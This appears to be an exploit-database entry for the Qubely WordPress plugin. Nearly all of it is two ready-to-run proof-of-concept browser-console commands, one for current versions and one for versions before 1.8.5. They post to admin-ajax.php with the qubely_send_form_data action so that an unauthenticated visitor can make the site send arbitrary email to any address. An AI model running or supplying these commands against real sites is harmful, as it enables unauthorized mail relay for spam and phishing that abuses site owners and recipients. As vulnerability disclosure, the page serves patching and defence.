Share
## https://sploitus.com/exploit?id=WPEX-ID:93B893BE-59AD-4500-8EDB-9FA7A45304D5
Execute the below command in the web developer console, on the blog homepage as an unauthenticated user, replacing domain by the domain of the blog:

Current PoC:

jQuery.post('/wp-admin/admin-ajax.php?action=qubely_send_form_data', { 'email-receiver': 'victim@whatever.com', 'email-subject': 'Unauthorised Email', 'email-from': 'xx:sender@DOMAIN', 'email-body':'Yolo', 'security': qubely_urls['nonce'] })


Pre-1.8.5 PoC:


jQuery.post('/wp-admin/admin-ajax.php?action=qubely_send_form_data', { 'email-receiver': btoa('victim@whatever.com'), 'email-subject': btoa('Unauthorised Email'), 'email-from': btoa('xx:sender@DOMAIN'), 'email-body': btoa('Yolo') });